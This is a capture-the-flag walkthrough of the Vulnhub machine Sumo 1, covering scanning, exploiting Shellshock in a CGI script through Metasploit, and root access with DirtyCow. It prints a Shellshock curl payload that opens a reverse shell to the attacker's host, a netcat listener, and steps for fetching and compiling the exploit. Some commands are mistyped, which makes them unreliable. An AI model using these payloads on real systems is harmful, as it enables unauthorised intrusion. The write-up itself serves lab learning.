SUMO 1 – Vulnhub Walkthrough

This write up is about a simple vulnerable machine Sumo 1.
It is a boot2root challenge from Vulnhub for beginners. In this vulnerable machine we must find the flag which is hidden inside.

Also, I have used RustScan for network scanning which is a new tool and bit faster than traditional Nmap.

Lets me explain more about it further inside!

PTES Methodology:

Information Gathering:

• Netdiscover
• RustScan

Vulnerability Analysis:

• Using Nikto.
• Using dirbuster.

Exploitation:

• Exploiting Shellshock Vulnerability using Metasploit.
• Gaining session using Meterpreter.

Post Exploitation:

• Enumerating for Privilege Escalation.

At Last Capture the Flag 🏁

Information Gathering:

First let’s find out the IP address assigned to the machine. For that I am using commonly used Netdiscover tool.

kali@kali:~$ sudo netdiscover

 

After few seconds of scanning I discovered the IP address 192.168.70.128. To confirm it lets check the IP in the browser.

Now I am going scan for the services running on the host 192.168.70.128 using RustScan.

Traditionally in Penetration testing we use popular tool NMAP but recently I came through RustScan which claims to be faster than NMAP. So, I just wanted to give a try

RustScan scanned the ports in 13.08 seconds and I got port 22 and 80 open.
But personally, I like Nmap rather than RustScan. I didn’t get much information in Networking scanning.

You can download RustScan from here https://github.com/RustScan/RustScan/releases

Now let’s go the next phase

Vulnerability Analysis

I didn’t find much information in Networking scanning and the webpage so let’s find enumerate the directories in the Webpage.

For this I am going to use simple DirBuster

kali@kali:~$ dirb http://192.168.70.128

Here I found that http://192.168.70.128/cgi-bin.

Let’s explore if the /cgi-bin is accessible

OOPS! That is a dead end.

As I found /cgi-bin I checked whether it has any vulnerability or exploits.
Now I came through ShellShock exploit which is an old vulnerability now patched.

I tried my luck using Nikto to confirm whether it really has ShellShock vulnerability.

kali@kali:~$ nikto -h 192.168.70.128

I was lucky and found that the site is vulnerable for ShellShock
Then opened it in the browser.

I am able to access /cgi-bin/test.sh.

To know more about shellshock, https://en.wikipedia.org/wiki/Shellshock_(software_bug)

As now I found the host is vulnerable for ShellShock, my next step is to exploit the vulnerability.

Exploitation:

ShellShock is a code injection exploitable vulnerability. I am going to exploited using the tool called Metasploit.

Here, I am going to use the easy method by using Metasploit.

To start Metasploit in Kali type” msfconsole” in the terminal

Use “search“ command to search for all shellshock exploits. You can also use Searchsploit in the terminal to find the exploits available

Now we need to choose the right exploit code to exploit the vulnerable machine.

I just used the auxiliary scanner on the target host for shellshock vulnerability.

msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env

And I got the result for the scan,

Don’t forget to set the TARGETURI path

Let’s exploit!

I got the meterpreter session. Now let’s explore more.

The machine runs in older version of Ubuntu 12.04. This must be interesting as it has a linux 3.2.0

As machine is running in Ubuntu 12.04 and the after a quick search I found it has a Local Privilege Escalation vulnerability.

But I have only limited access

Post Exploitation:

Getting a reverse shell was easy in this machine

curl -H ‘User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.70.129/9001 0>&1’ http://192.168.70.128/cgi-bin/test/test.cgi


And I was listening to the port 9001 using Netcat

kali@kali:~$ nc -lvnp 9001

Here I used the famous DirtyCow exploit. Compile the exploit code using

gcc -pthread dirty.c -o -dirty -lcrypt

To upload the exploit, I have to go to /tmp directory and used wget to download the exploit.

Before that I used a simple python script and hosted the exploit from local machine.

Run Python -m SimpleHTTPServer 91 and wget the exploit.

Now Run wget http://192.168.70.129:91:dirty.c
Here use your IP address

Now I have successfully uploaded the exploit code into the vulnerable machine.

Then I compiled the exploit dirty.c inside the host but it throwed error.

After checking google I found a simple way to change the directory path so that it gets compiled without errors.

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

 

Now the exploit is compiled and only thing I must do is open SSH.

Boom! I gained access inside the vulnerable machine and the Flag is captured.

 

References:

https://www.exploit-db.com/raw/40839
https://en.wikipedia.org/wiki/Dirty_COW
https://www.cs.purdue.edu/homes/bb/cs348/www-S08/unix_path.html
https://www.thegeekdiary.com/how-to-change-the-path-variable-in-linux/
https://github.com/RustScan/RustScan
https://www.exploit-db.com/exploits/40938/
https://en.wikipedia.org/wiki/Shellshock_(software_bug)